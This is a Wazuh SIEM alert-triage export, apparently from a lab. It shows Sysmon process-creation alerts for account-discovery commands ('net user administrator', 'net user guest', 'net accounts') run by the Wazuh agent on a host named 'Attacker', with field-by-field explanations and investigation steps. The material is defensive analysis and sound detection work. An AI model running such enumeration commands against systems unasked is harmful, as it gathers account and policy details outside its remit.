List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1017856
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.3699637Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282306
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.361 ProcessGuid: {94294ddc-bcca-680a-bd0a-000000000e00} ProcessId: 15012 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} ParentProcessId: 4340 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-bd0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-bb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.041+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.041+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1022997
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.4155645Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282309
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.411 ProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} ProcessId: 4344 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.411
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-be0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4344
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.073+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.073+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1028244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the record. Microsoft-Windows-Sysmon means the eventID below is a Sysmon event type, not a Security-log ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon ETW provider; filter on it when provider names are renamed or localised.

data.win.system.eventID:  1
Sysmon event type: 1 = Process Create (this alert). Pivots for the same process: 3 = Network Connection, 11 = File Create, 22 = DNS Query.

data.win.system.version:  5
Schema version of this Sysmon event type. Newer Sysmon releases add fields, so parsers should key on it rather than assume a layout.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon writes everything at this level; the severity that matters is the Wazuh rule level above.

data.win.system.task:  1
For Sysmon records the task mirrors the event ID (1 = Process Create); it adds nothing on its own.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.6519336Z
When the record was written to the Windows event log. eventdata.utcTime below is when Sysmon observed the event and is the time to put on the timeline; the Wazuh timestamp above is later still because it marks manager processing.

data.win.system.eventRecordID:  282313
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported; it is 3712 in every Sysmon alert from this host. The process under investigation is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Pull the neighbouring records with Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' on the host.

data.win.system.computer:  Attacker
Hostname Windows stamped on the record. Should equal agent.name; a mismatch means a renamed host or an agent reporting for another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.645 ProcessGuid: {94294ddc-bcca-680a-c00a-000000000e00} ProcessId: 8816 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} ParentProcessId: 4344 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
Rendered event text with every eventdata field in one string. Fine for a quick read or a copy-and-paste search; use the parsed eventdata fields for anything programmatic.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.645
When Sysmon observed the process start, in UTC. Use this, not the Wazuh timestamp, on the timeline; here the Wazuh timestamp is about a minute later because of collection delay.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-c00a-000000000e00}
Sysmon's unique ID for this process instance. Unlike the PID it is never reused, so it is the join key to this process's later EID 3 (network), EID 11 (file) and EID 22 (DNS) records and to its children's parentProcessGuid.

data.win.eventdata.processId:  8816
Windows PID of the new process. PIDs are recycled, so pair it with processGuid or utcTime when searching.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
Full path of the new executable. SysWOW64 means the 32-bit copy ran, expected when the parent chain is 32-bit (the agent is installed under Program Files (x86)). A system binary running from any other folder would be a red flag.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version from the binary's resource block; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line. A system binary whose version does not match the host's build is suspect.

data.win.eventdata.description:  Net Command
Description string from the PE version resource. Sysmon copies it verbatim and does not verify it, so treat it as a hint, never as proof of what the file is.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same caveat, anyone can set it.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; same caveat. Authenticode signature status is not in this event, check it separately.

data.win.eventdata.originalFileName:  net1.exe
Internal file name compiled into the binary. When it differs from the file name in image the binary was renamed, a classic trick for hiding a LOLBin. Here they match.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
Exact command line. `net1 user guest` reads the Guest account's status and properties. It is what `net user guest` becomes: net.exe hands most subcommands to net1.exe, so this is one command seen twice in the process tree, not two queries.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory inherited from the parent. This is the Wazuh agent's install directory, so the agent's own process tree started this; the first question is whether a scheduled agent check (for example an SCA policy scan) ran at 22:35:54 UTC.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. NT AUTHORITY\SYSTEM in session 0 is a service context, not a logged-in user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon's GUID for the logon session; join it to every other event from the same logon.

data.win.eventdata.logonId:  0x3e7
Windows logon session ID. 0x3e7 (999) is the well-known SYSTEM session shared by every service, so it cannot tell one service from another.

data.win.eventdata.terminalSessionId:  0
0 is the non-interactive services session, consistent with a service or agent.

data.win.eventdata.integrityLevel:  System
System, the highest integrity level, consistent with a SYSTEM service.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
Hash of the executable as Sysmon is configured to compute it (SHA256 here). Compare with a known-good copy of the same build or a reputation service to confirm it is the genuine Microsoft binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-be0a-000000000e00}
processGuid of the parent. Join it to the parent's own EID 1 to walk the ancestry further up.

data.win.eventdata.parentProcessId:  4344
PID of the parent when the spawn happened.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
net.exe spawning net1.exe is normal: net.exe is a thin wrapper that runs most subcommands through net1.exe. The interesting process is net.exe's own parent, which this alert does not show; pull the EID 1 for PID 4344.

data.win.eventdata.parentCommandLine:  net user guest
Full command line of the parent; `net user guest` is the typed (or scripted) form of the query above.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as. Same as the child here, so no credential change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
Check whether the Wazuh agent's own scheduled checks (SCA policy scan or similar) ran on host Attacker at 22:35:54 UTC: this command ran as SYSTEM from the agent's install directory, and the next alert shows wazuh-agent.exe running `net accounts` 81 ms later.
If the agent did not run it, pull the Sysmon EID 1 for net.exe PID 4344 (ProcessGuid {94294ddc-bcca-680a-be0a-000000000e00}) to find what started it, and list every process created under that parent in the surrounding minute.
Confirm nothing changed afterwards: a Security Event ID 4722 (account enabled) or 4738 (account changed) for the Guest account would turn a read-only query into account manipulation.
Review the other 7 hits behind rule.firedtimes 8; identical origin and cadence means the agent, anything else means a person or a script.

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.118+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery. The parent is wazuh-agent.exe, so verify this `net accounts` against the agent's SCA (or other scheduled check) configuration on host Attacker; if it matches, tune the rule on parentImage rather than closing these alerts one by one.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.118+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1033317
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the record. Microsoft-Windows-Sysmon means the eventID below is a Sysmon event type, not a Security-log ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon ETW provider; filter on it when provider names are renamed or localised.

data.win.system.eventID:  1
Sysmon event type: 1 = Process Create (this alert). Pivots for the same process: 3 = Network Connection, 11 = File Create, 22 = DNS Query.

data.win.system.version:  5
Schema version of this Sysmon event type. Newer Sysmon releases add fields, so parsers should key on it rather than assume a layout.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon writes everything at this level; the severity that matters is the Wazuh rule level above.

data.win.system.task:  1
For Sysmon records the task mirrors the event ID (1 = Process Create); it adds nothing on its own.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.7314204Z
When the record was written to the Windows event log. eventdata.utcTime below is when Sysmon observed the event and is the time to put on the timeline; the Wazuh timestamp above is later still because it marks manager processing.

data.win.system.eventRecordID:  282317
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported; it is 3712 in every Sysmon alert from this host. The process under investigation is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Pull the neighbouring records with Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' on the host.

data.win.system.computer:  Attacker
Hostname Windows stamped on the record. Should equal agent.name; a mismatch means a renamed host or an agent reporting for another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.726 ProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00} ProcessId: 2332 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
Rendered event text with every eventdata field in one string. Fine for a quick read or a copy-and-paste search; use the parsed eventdata fields for anything programmatic.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.726
When Sysmon observed the process start, in UTC. Use this, not the Wazuh timestamp, on the timeline; here the Wazuh timestamp is about a minute later because of collection delay.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-c10a-000000000e00}
Sysmon's unique ID for this process instance. Unlike the PID it is never reused, so it is the join key to this process's later EID 3 (network), EID 11 (file) and EID 22 (DNS) records and to its children's parentProcessGuid.

data.win.eventdata.processId:  2332
Windows PID of the new process. PIDs are recycled, so pair it with processGuid or utcTime when searching.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
Full path of the new executable. SysWOW64 means the 32-bit copy ran, expected because the parent (wazuh-agent.exe under Program Files (x86)) is 32-bit. A system binary running from any other folder would be a red flag.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version from the binary's resource block; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line. A system binary whose version does not match the host's build is suspect.

data.win.eventdata.description:  Net Command
Description string from the PE version resource. Sysmon copies it verbatim and does not verify it, so treat it as a hint, never as proof of what the file is.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same caveat, anyone can set it.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; same caveat. Authenticode signature status is not in this event, check it separately.

data.win.eventdata.originalFileName:  net.exe
Internal file name compiled into the binary. When it differs from the file name in image the binary was renamed, a classic trick for hiding a LOLBin. Here they match.

data.win.eventdata.commandLine:  net.exe accounts
Exact command line. `net accounts` prints the local password and lockout policy (minimum length, maximum age, lockout threshold), a standard reconnaissance step but equally a standard compliance check.

